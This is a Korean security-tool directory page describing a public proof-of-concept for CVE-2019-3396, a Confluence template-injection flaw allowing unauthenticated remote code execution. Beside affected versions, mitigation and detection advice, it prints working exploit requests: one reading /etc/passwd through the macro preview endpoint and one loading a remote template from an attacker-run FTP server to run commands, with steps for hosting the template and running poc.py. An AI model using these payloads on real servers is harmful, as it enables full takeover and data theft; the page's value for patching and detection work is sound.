Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-3396 — CVE-2019-3396 confluence SSTI RCE | Kitploit
도구/GitHubGitHub/kh4sh3i/cve-2019-3396
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubkh4sh3i/cve-2019-3396

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

저장소 보기
211개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-3396

CVE-2019-3396 confluence SSTI RCE

🔎 CVE-2019-3396란?

  • Atlassian Confluence의 심각한 버그입니다.
  • 유형: 템플릿 인젝션 + 경로 탐색
  • 위험: 로그인 없이 원격 코드 실행(RCE) 가능
  • 상태: 야생에서 악용됨

🛑 영향을 받는 버전

  • 6.6.0 ~ 6.6.11 ❌ 취약
  • 6.6.12 ✅ 수정됨
  • 6.12.0 ~ 6.12.2 ❌ 취약
  • 6.12.3 ✅ 수정됨
  • 6.13.0 ~ 6.13.2 ❌ 취약
  • 6.13.3 ✅ 수정됨
  • 6.14.0 ~ 6.14.1 ❌ 취약
  • 6.14.2 ✅ 수정됨

👉 자세한 내용은 항상 Atlassian 공식 권고를 확인하세요.


💥 영향

  • 완전한 서버 장악
  • 데이터 탈취, 랜섬웨어, 암호화폐 채굴기
  • 공격자는 원하는 모든 코드를 실행할 수 있음

🔐 완화 조치

  • ✅ 업그레이드하여 패치된 Confluence 버전 사용 (최선의 조치)
  • 🚫 즉시 패치할 수 없는 경우 위젯 커넥터 매크로 비활성화
  • 🔒 액세스 제한 (수정될 때까지 내부 전용)

👀 탐지 (안전한 팁)

  • 매크로/미리보기 엔드포인트에 대한 이상한 요청을 로그에서 모니터링
  • 비정상적인 프로세스 또는 아웃바운드 트래픽 확인
  • 취약점 스캐너를 사용하여 버전 확인

📂 파일 읽기

도구 다운로드
root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}

{"macro":{"params":{"_template":"file:///etc/passwd"}}}

명령 실행

root@kitploit:~
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***

{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}

자동화

  • VPS에 cmd.vm 업로드
  • 이 cmd.vm 파일에 대한 링크를 만들기 위해 ftp 또는 https 사용
root@kitploit:~
pip install pyftpdlib
python -m pyftpdlib -p  8888
  • poc.py 파일의 pyftp 값을 업데이트: pyftp = "ftp://10.100.10.100:8888/cmd.vm"
root@kitploit:~
python poc.py <url> <cmd>
python poc.py https://ip:port  "id"

⚠️ 팁 — 이 저장소는 교육, 방어 및 인식 제고 용도로만 사용하세요.


🔗 참고 자료

  • Atlassian Advisory 🏢
  • NVD의 CVE-2019-3396 항목 🛡️